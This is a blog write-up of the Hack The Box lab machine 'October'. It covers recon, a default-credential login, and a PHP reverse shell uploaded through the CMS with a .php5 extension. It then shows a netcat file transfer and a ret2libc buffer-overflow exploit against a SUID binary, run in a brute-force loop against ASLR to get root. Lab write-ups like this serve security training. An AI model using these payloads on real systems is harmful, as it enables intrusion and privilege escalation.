Posted on by

HTB: October

Details

This machine is October from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-28 14:45 EDT
Nmap scan report for 10.10.10.16
Host is up (0.046s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.11 seconds

User

I started on http://10.10.10.16

Screenshot 1

I went to http://10.10.10.16/backend/

Screenshot 2

Where I tried creds of 

admin:admin

Screenshot 3

So according to https://www.exploit-db.com/exploits/41936 I may be able to upload php by using the .php5 extension, so I took a php reverse shell, and changed it’s extension to .php5. Then headed over to the media menu

Screenshot 4

I uploaded it and set a listener

root@kali:~# nc -nlvp 4444

And visited the file at http://10.10.10.16/storage/app/media/php-reverse-shell.php5

connect to [10.10.14.11] from (UNKNOWN) [10.10.10.16] 49986
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
 22:03:51 up 1 min,  0 users,  load average: 0.18, 0.11, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

There is the shell. So I upgraded it 

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@october:/$

And went flag hunting 

www-data@october:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 Apr 20  2017 .
drwxr-xr-x 21 root  root  4096 May 17  2017 ..
drwxr-xr-x  4 harry harry 4096 Apr 21  2017 harry

www-data@october:/home$ cd harry
www-data@october:/home/harry$ ls -la
total 5044
drwxr-xr-x 4 harry harry    4096 Apr 21  2017 .
drwxr-xr-x 3 root  root     4096 Apr 20  2017 ..
-rw------- 1 root  root        1 Dec 24  2017 .bash_history
-rw-r--r-- 1 harry harry     220 Apr 20  2017 .bash_logout
-rw-r--r-- 1 harry harry    3637 Apr 20  2017 .bashrc
drwx------ 2 harry harry    4096 Apr 20  2017 .cache
drwxr-xr-x 3 root  root     4096 Apr 20  2017 .composer
-rw------- 1 root  root       10 May 17  2017 .nano_history
-rw-r--r-- 1 harry harry     675 Apr 20  2017 .profile
-rw-rw-r-- 1 harry harry 5123369 Apr 20  2017 october-1.0.412.tar.gz
-r--r--r-- 1 harry harry      33 Apr 21  2017 user.txt

www-data@october:/home/harry$ cat user.txt
[REDACTED]

Root

I then searched for suid binaries 

www-data@october:/home/harry$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/local/bin/ovrflw

One called overflow, so I took a look

www-data@october:/home/harry$ cd /usr/local/bin
www-data@october:/usr/local/bin$ ls -la
total 16
drwxr-xr-x  2 root root 4096 Apr 21  2017 .
drwxr-xr-x 10 root root 4096 Apr 20  2017 ..
-rwsr-xr-x  1 root root 7377 Apr 21  2017 ovrflw

www-data@october:/usr/local/bin$ file ovrflw
ovrflw: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=004cdf754281f7f7a05452ea6eaf1ee9014f07da, not stripped

www-data@october:/usr/local/bin$ ./ovrflw hi

I tried to make it crash

www-data@october:/usr/local/bin$ ./ovrflw $(python -c "print('A'*1000)")
Segmentation fault (core dumped)

So I can crash it, I needed to take a copy back to my machine 

root@kali:~# nc -nvlp 5555 > ovrflw

www-data@october:/usr/local/bin$ nc 10.10.14.11 5555 < ovrflw

Running it into gdb I found I could overwrite EIP with 112 As and 4 Bs

gdb-peda$ run $(python -c "print('A'*112 + 'BBBB')")
Starting program: /tmp/ovrflw $(python -c "print('A'*112 + 'BBBB')")

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd590 ("AABBBB")
EDX: 0xffffd2ea ("AABBBB")
ESI: 0xf7fab000 --> 0x1d9d6c
EDI: 0xf7fab000 --> 0x1d9d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd2f0 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd2f0 --> 0x0
0004| 0xffffd2f4 --> 0xffffd384 --> 0xffffd516 ("/tmp/ovrflw")
0008| 0xffffd2f8 --> 0xffffd390 --> 0xffffd597 ("SHELL=/bin/bash")
0012| 0xffffd2fc --> 0xffffd314 --> 0x0
0016| 0xffffd300 --> 0x1
0020| 0xffffd304 --> 0x0
0024| 0xffffd308 --> 0xf7fab000 --> 0x1d9d6c
0028| 0xffffd30c --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSE

I then checked it for binary protections 

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

It has NX, so I checked the host for ASLR

www-data@october:/usr/local/bin$ cat /proc/sys/kernel/randomize_va_space
2

ASLR is on. I’ll use ret2libc for the exploit, and as it is a 32bit binary I’ll brute force the ASLR. So I grabbed the various memory locations I needed 

www-data@october:/usr/local/bin$ gdb ./ovrflw
(gdb) b main
Breakpoint 1 at 0x8048480

(gdb) run
Starting program: /usr/local/bin/ovrflw

Breakpoint 1, 0x08048480 in main ()

(gdb) p system
$1 = {<text variable, no debug info>} 0xb75d2310 <__libc_system>

(gdb) p exit
$2 = {<text variable, no debug info>} 0xb75c5260 <__GI_exit>

(gdb) find 0xb75d2310, +99999999, "/bin/sh"
find 0xb75d2310, +99999999, "/bin/sh"
0xb76f4bac

So 

system: 0xb75d2310
exit: 0xb75c5260
/bin/sh: 0xb76f4bac

Need to little endian them and run in a loop on the relevant exploit. I want to input 

GARBAGE + SYSTEM + EXIT + BINSH

So my exploit was 

$(python -c "print('A'*112 + '\x10\x23\x5d\xb7' + '\x60\x52\x5c\xb7' + '\xac\x4b\x6f\xb7')")

Which I ran in a loop to defeat ASLR

www-data@october:/$ while true; do /usr/local/bin/ovrflw $(python -c "print('A'*112 + '\x10\x23\x5d\xb7' + '\x60\x52\x5c\xb7' + '\xac\x4b\x6f\xb7')"); done

I then waited for a while letting it run. Until eventually 

#

A shell opened 

# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

And I’m root, so I grabbed my flag

# cd /root

# ls -la
total 32
drwx------  3 root root 4096 Dec 24  2017 .
drwxr-xr-x 21 root root 4096 May 17  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 May  6  2017 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root  647 Dec 24  2017 .viminfo
-r--------  1 root root   33 Apr 21  2017 root.txt

# cat root.txt
[REDACTED]

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.